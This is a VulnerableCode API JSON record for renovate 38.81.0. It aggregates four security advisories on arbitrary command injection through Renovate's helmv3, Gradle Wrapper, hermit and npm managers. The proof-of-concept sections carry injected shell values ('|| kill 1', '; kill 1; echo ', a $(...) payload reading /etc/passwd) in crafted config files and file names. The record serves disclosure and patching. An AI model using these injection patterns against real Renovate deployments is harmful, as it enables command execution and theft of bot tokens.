{"url":"http://public2.vulnerablecode.io/api/packages/899337?format=json","purl":"pkg:npm/renovate@38.81.0","type":"npm","namespace":"","name":"renovate","version":"38.81.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"42.96.3","latest_non_vulnerable_version":"43.102.11","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18513?format=json","vulnerability_id":"VCID-cqbc-m5e2-tfaj","summary":"Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file\n### Summary\nThe user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `Chart.yaml` in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nThe value for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  // Register any credentials to make the manager attempt to use basic auth for the Helm registry\n  hostRules: [\n    {\n      matchHost: \"charts.bitnami.com\",\n      username: \"un\",\n      password: \"pw\",\n    },\n  ],\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"helmv3\"],\n      // Don't consult the actual bitnami repo\n      registryUrls: [],\n      // But still, trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`Chart.yaml`:\n\n```yaml\napiVersion: v2\nname: renovate-aci-1\nversion: 0.0.1\ndependencies:\n  - name: redis\n    version: 0.1.0\n    repository: oci://charts.bitnami.com/bitnami || kill 1\n\n```\n\n\n`Chart.lock`:\n\n```yaml\ndependencies:\n- name: redis\n  repository: oci://charts.bitnami.com/bitnami\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg"},{"reference_url":"https://github.com/advisories/GHSA-3f44-xw83-3pmg","reference_id":"GHSA-3f44-xw83-3pmg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3f44-xw83-3pmg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-3f44-xw83-3pmg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cqbc-m5e2-tfaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19078?format=json","vulnerability_id":"VCID-e5zm-81zq-9kba","summary":"Renovate vulnerable to arbitrary command injection via Gradle Wrapper and malicious `distributionUrl`\n### Summary\nRenovate can be tricked into executing shell code while updating the Gradle Wrapper. A malicious `distributionUrl` in `gradle/wrapper/gradle-wrapper.properties` can lead to command execution in the Renovate runtime.\n\n### Details\nWhen Renovate handles Gradle Wrapper artifacts, it may run a wrapper update command such as:\n- `./gradlew :wrapper --gradle-distribution-url <value>`\n\nIn the observed behavior, Renovate executes this via a shell (e.g., `/bin/sh -c ...`).  \nIf `distributionUrl` contains shell command substitution syntax like `$(...)`, the shell evaluates it **before** Gradle validates/parses the URL.\n\nAfter that, Gradle attempts to parse the URL as a URI and fails with `URISyntaxException`, but the shell substitution has already executed.\n\nThis is reproducible even when `allowScripts` is disabled (default is OFF), because this execution happens as part of Gradle Wrapper artifact handling rather than “repository install scripts”.\n\nPrerequisites / attack conditions:\n- The attacker must be able to get a malicious `gradle-wrapper.properties` into a repository that Renovate scans (e.g., direct write access, or a maintainer merges an attacker’s change/PR).\n- Renovate must be configured to process Gradle Wrapper updates/artifacts for that repository (default behavior for the Gradle Wrapper manager).\n\n### PoC\n1. Create a repository with a Gradle Wrapper (`gradlew`, `gradlew.bat`, `gradle/wrapper/gradle-wrapper.jar`, and `gradle/wrapper/gradle-wrapper.properties`).\n2. Set `distributionUrl` in `gradle-wrapper.properties` to include `$(...)`.\n3. Run Renovate against the repository.\n4. Observe that a file is created during Renovate’s wrapper update step **before** Gradle fails with `URISyntaxException`.\n\nA [screen recording](https://drive.google.com/file/d/1nveSCgyz4pKPCZuelqDD_xGEO00DXr4P/view) is attached showing end-to-end reproduction. In the demo, the payload creates `/tmp/passwd_dump` containing `/etc/passwd`, demonstrating that file read/exfiltration is possible within the Renovate execution context.\n\n### Impact\nThis allows arbitrary command execution in the Renovate runtime during Gradle Wrapper updates. Depending on deployment, this may expose credentials/tokens available to the bot and may allow an attacker to modify repositories or access internal resources reachable from the Renovate environment.\n\n### Remediation\n\nUpgrading to Renovate [42.68.5](https://github.com/renovatebot/renovate/releases/tag/42.68.5) (2025-12-31) fixes this issue, and closes out other risks of shell evaluation for commands run by Renovate.\n\nIf using the `composer`, `yarn` (v1) or `flux` managers, please upgrade to [42.74.5](https://github.com/renovatebot/renovate/releases/tag/42.74.5) (2026-01-08), as there were follow-up fixes to keep these managers working.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/releases/tag/42.68.5","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/releases/tag/42.68.5"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96"},{"reference_url":"https://github.com/advisories/GHSA-pfq2-hh62-7m96","reference_id":"GHSA-pfq2-hh62-7m96","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pfq2-hh62-7m96"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/54603?format=json","purl":"pkg:npm/renovate@42.68.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-zk8k-vkvs-9ufs"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@42.68.5"}],"aliases":["GHSA-pfq2-hh62-7m96"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e5zm-81zq-9kba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19180?format=json","vulnerability_id":"VCID-erkn-fu4w-zygm","summary":"Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies\n### Summary\nThe user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously named hermit dependency in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nAll values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.\nIn version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.\nWhen support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"hermit\"],\n      // Trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`bin/hermit`:\n\n```bash\n#!/bin/bash\n#\n# THIS FILE IS GENERATED; DO NOT MODIFY\n\nset -eo pipefail\n\nexport HERMIT_USER_HOME=~\n\nif [ -z \"${HERMIT_STATE_DIR}\" ]; then\n  case \"$(uname -s)\" in\n  Darwin)\n    export HERMIT_STATE_DIR=\"${HERMIT_USER_HOME}/Library/Caches/hermit\"\n    ;;\n  Linux)\n    export HERMIT_STATE_DIR=\"${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit\"\n    ;;\n  esac\nfi\n\nexport HERMIT_DIST_URL=\"${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}\"\nHERMIT_CHANNEL=\"$(basename \"${HERMIT_DIST_URL}\")\"\nexport HERMIT_CHANNEL\nexport HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}\n\nif [ ! -x \"${HERMIT_EXE}\" ]; then\n  echo \"Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}\" 1>&2\n  INSTALL_SCRIPT=\"$(mktemp)\"\n  # This value must match that of the install script\n  INSTALL_SCRIPT_SHA256=\"09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6\"\n  if [ \"${INSTALL_SCRIPT_SHA256}\" = \"BYPASS\" ]; then\n    curl -fsSL \"${HERMIT_DIST_URL}/install.sh\" -o \"${INSTALL_SCRIPT}\"\n  else\n    # Install script is versioned by its sha256sum value\n    curl -fsSL \"${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh\" -o \"${INSTALL_SCRIPT}\"\n    # Verify install script's sha256sum\n    openssl dgst -sha256 \"${INSTALL_SCRIPT}\" | \\\n      awk -v EXPECTED=\"$INSTALL_SCRIPT_SHA256\" \\\n      '$2!=EXPECTED {print \"Install script sha256 \" $2 \" does not match \" EXPECTED; exit 1}'\n  fi\n  /bin/bash \"${INSTALL_SCRIPT}\" 1>&2\nfi\n\nexec \"${HERMIT_EXE}\" --level=fatal exec \"$0\" -- \"$@\"\n\n```\n\n\n`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):\n\nA symlink to `hermit`\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.\n\n### Impact\nTThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff"},{"reference_url":"https://github.com/advisories/GHSA-36j9-mx87-2cff","reference_id":"GHSA-36j9-mx87-2cff","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-36j9-mx87-2cff"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-36j9-mx87-2cff"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-erkn-fu4w-zygm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19076?format=json","vulnerability_id":"VCID-uaf4-6678-xke8","summary":"Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration\n### Summary\nThe user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.\n\n\n### Details\nAdversaries can provide a maliciously crafted Renovate configuration file to trick Renovate to execute arbitrary code.\nThe user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27 of 2023.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"11.1.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"npm\"],\n      // Provide a command in the package name\n      overridePackageName: \"; kill 1; echo \",\n      // Override the datasource to prevent a lookup failure\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`package.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"dependencies\": {\n    \"uuid\": \"^11.0.0\"\n  }\n}\n```\n\n\n`package-lock.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"lockfileVersion\": 3,\n  \"requires\": true,\n  \"packages\": {\n    \"\": {\n      \"name\": \"renovate-aci-4\",\n      \"version\": \"0.0.1\",\n      \"dependencies\": {\n        \"uuid\": \"^11.0.0\"\n      }\n    },\n    \"node_modules/uuid\": {\n      \"version\": \"11.0.0\",\n      \"resolved\": \"https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz\",\n      \"integrity\": \"sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==\",\n      \"funding\": [\n        \"https://github.com/sponsors/broofa\",\n        \"https://github.com/sponsors/ctavan\"\n      ],\n      \"license\": \"MIT\",\n      \"bin\": {\n        \"uuid\": \"dist/esm/bin/uuid\"\n      }\n    }\n  }\n}\n\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj"},{"reference_url":"https://github.com/advisories/GHSA-fr4j-65pv-gjjj","reference_id":"GHSA-fr4j-65pv-gjjj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr4j-65pv-gjjj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-fr4j-65pv-gjjj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uaf4-6678-xke8"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@38.81.0"}